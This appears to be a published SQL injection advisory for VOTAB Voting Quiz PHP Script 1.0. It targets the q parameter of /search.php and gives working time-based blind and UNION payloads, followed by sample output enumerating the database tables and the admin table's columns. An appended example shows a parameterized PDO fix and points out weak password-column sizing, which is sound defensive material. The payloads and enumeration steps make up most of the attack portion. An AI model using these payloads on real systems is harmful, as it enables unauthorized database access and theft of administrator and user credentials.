CraCkEr

THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : codesler.com
Vendor    : Codesler - Rohit Chouhan (codester.com)
Software  : VOTAB - Voting Quiz PHP Script 1.0
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Greets:

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/0x0CryptoJob

CraCkEr 2023

Path: /search.php

https://website/search.php?q=[SQLI]

GET parameter 'q' is vulnerable to SQL Injection

---
Parameter: q (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=' AND (SELECT 5257 FROM (SELECT(SLEEP(5)))xauk) AND 'xYsK'='xYsK

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: q=' UNION ALL SELECT CONCAT(0x71707a7171,0x53474f4b726f5a754b696a76766959614569735371744d4d6d7a646a7069654b6666795967414a47,0x7176786b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---

[+] Starting the Attack

fetching current database
current database: '**401**_votab'

fetching tables
+---------------+
| activity      |
| admin         |
| settings      |
| smtp_settings |
| users         |
| vote          |
| votes         |
+---------------+

fetching columns for table 'admin'
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| name     | text        |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[-] Done
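How a search endpoint like the /search.php reported above can pass the q parameter to the database only as a bound value, shown as an added example that is not VOTAB's code or the advisory author's. The table name "vote" is taken from the listing above; the "title" column, the function names and the in-memory SQLite database are assumptions made so the example runs offline.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for the application's database (in-memory SQLite).
// Column "title" is an assumed name for illustration.
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // On MySQL, also set PDO::ATTR_EMULATE_PREPARES to false for server-side prepares.
    $pdo->exec('CREATE TABLE vote (id INTEGER PRIMARY KEY, title TEXT)');
    $pdo->exec("INSERT INTO vote (title) VALUES ('Best editor'), ('Best 100% free tool')");
    return $pdo;
}

// Hardened search: the value of q is only ever a bound parameter.
// The pattern to avoid is building the statement by string concatenation,
// e.g. "... WHERE title LIKE '%" . $_GET['q'] . "%'".
function search_votes(PDO $pdo, string $q): array
{
    $q = substr(trim($q), 0, 64);   // bound the input length
    // Escape LIKE metacharacters so % and _ typed by the user match literally.
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $q);
    $stmt = $pdo->prepare("SELECT id, title FROM vote WHERE title LIKE :pattern ESCAPE '!'");
    $stmt->execute([':pattern' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$pdo = open_demo_db();
// Constructed inputs: ordinary term, LIKE wildcard, value containing a quote.
foreach (['editor', '%', "editor' -- "] as $q) {
    printf("%-12s => %d row(s)\n", $q, count(search_votes($pdo, $q)));
}
```

The `admin.password varchar(20)` column in the listing above is too short to hold a `password_hash()` bcrypt value (60 characters), so credential storage deserves review alongside the query fix.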